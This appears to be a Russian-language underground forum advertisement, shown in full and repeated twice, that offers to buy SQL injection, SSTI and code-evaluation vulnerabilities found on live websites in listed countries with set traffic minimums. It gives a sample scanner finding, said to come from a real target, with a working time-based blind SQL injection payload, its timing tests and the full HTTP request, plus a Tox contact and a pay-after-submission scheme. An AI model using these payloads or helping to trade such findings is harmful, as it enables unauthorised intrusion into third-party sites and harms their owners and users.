- Цена
- 05 - 100
- Контакты
- PM\TOX
Приветствую, комрад. Не можешь обойти WAF? Не умеешь крутить скули в разных субд? В целом не понимаешь как докрутить сайт и он тебе надоел? Не беда! Ты все равно сможешь на этом заработать. Мы выкупим твою уязвимость у тебя если она нам подойдёт.
Уникальное предложение, ты можешь просто сканировать окунем и зарабатывать!
Критерии:
GEO - вот они сверху вниз
Австралия
Аргентина
Австрия
Бразилия
Великобритания
Венесуэла
Венгрия
Германия
Дания
Ирландия
Испания
Италия
Эквадор
Канада
Катар
Кувейт
ОАЭ
Люксембург
Мексика
Нидерланды
Норвегия
Новая Зеландия
Норвегия
Сальвадор
США
Саудовская Аравия
Сингапур
Финляндия
Франция
Швейцария
Швеция
Япония
Traffic - Смотреть по https://similarweb.com/website/domain.com
Для шопов - 20к+
Для обычных сайтов - 100к+
CMS - любые.
Выкупаем: SQLI,SSTI,Code Evaluation(PHP/ASP)
Так же не возьмём если с этим сайтом мы уже работали или если это False Postive!
Нам нужен весь реквест с окуня и с проверками окуня если это например time sqli,bool sqli.
Сначала копируете вкладку attack details, потом полностью весь реквест.
Примерный вид:
Path Fragment input /<s>/[*]/ was set to qqq'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
Tests performed:
qqq'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.526
qqq'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.783
qqq'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.626
qqq'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.658
qqq'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.513
qqq'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.531
qqq'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.564
Original value: qqq
===================================
GET /qqqqqq/qqq'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: referer
Cookie: cookie
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: host
Connection: Keep-alive
======================
Пример взят с реального таргета поэтому важное замазал. Вот так нужно скидывать +-
РЕПОРТАМИ НЕ ПРИНИМАЮ!
Если много накопилось - шлите тогда либо txt файлом. Либо линк на записки какие нибудь, например привнот.
Ценник в среднем за уязвимость от 0.5 и до 100, все рассматривается индивидуально.
Пока работаем в тестовом режиме. В будущем расширим список и добавим правил, хехе.
Скидываете нам уязвимость, мы проверяем что это не ФП и отсутствие у нас в списках, и скидываем деньги.
Если не готовы скидывать вперед для проверки на FP - не пишите нам.
Связь в PM\tox.
TOX - 5081DB2BAF61F869D76142EFC027B3F8FF76D2081CF9AD3B4F9154495FD1133A71122A2AAA44
Уникальное предложение, ты можешь просто сканировать окунем и зарабатывать!
Критерии:
GEO - вот они сверху вниз
Австралия
Аргентина
Австрия
Бразилия
Великобритания
Венесуэла
Венгрия
Германия
Дания
Ирландия
Испания
Италия
Эквадор
Канада
Катар
Кувейт
ОАЭ
Люксембург
Мексика
Нидерланды
Норвегия
Новая Зеландия
Норвегия
Сальвадор
США
Саудовская Аравия
Сингапур
Финляндия
Франция
Швейцария
Швеция
Япония
Traffic - Смотреть по https://similarweb.com/website/domain.com
Для шопов - 20к+
Для обычных сайтов - 100к+
CMS - любые.
Выкупаем: SQLI,SSTI,Code Evaluation(PHP/ASP)
Так же не возьмём если с этим сайтом мы уже работали или если это False Postive!
Нам нужен весь реквест с окуня и с проверками окуня если это например time sqli,bool sqli.
Сначала копируете вкладку attack details, потом полностью весь реквест.
Примерный вид:
Path Fragment input /<s>/[*]/ was set to qqq'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
Tests performed:
qqq'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.526
qqq'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.783
qqq'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.626
qqq'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.658
qqq'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.513
qqq'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.531
qqq'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.564
Original value: qqq
===================================
GET /qqqqqq/qqq'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: referer
Cookie: cookie
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: host
Connection: Keep-alive
======================
Пример взят с реального таргета поэтому важное замазал. Вот так нужно скидывать +-
РЕПОРТАМИ НЕ ПРИНИМАЮ!
Если много накопилось - шлите тогда либо txt файлом. Либо линк на записки какие нибудь, например привнот.
Ценник в среднем за уязвимость от 0.5 и до 100, все рассматривается индивидуально.
Пока работаем в тестовом режиме. В будущем расширим список и добавим правил, хехе.
Скидываете нам уязвимость, мы проверяем что это не ФП и отсутствие у нас в списках, и скидываем деньги.
Если не готовы скидывать вперед для проверки на FP - не пишите нам.
Связь в PM\tox.
TOX - 5081DB2BAF61F869D76142EFC027B3F8FF76D2081CF9AD3B4F9154495FD1133A71122A2AAA44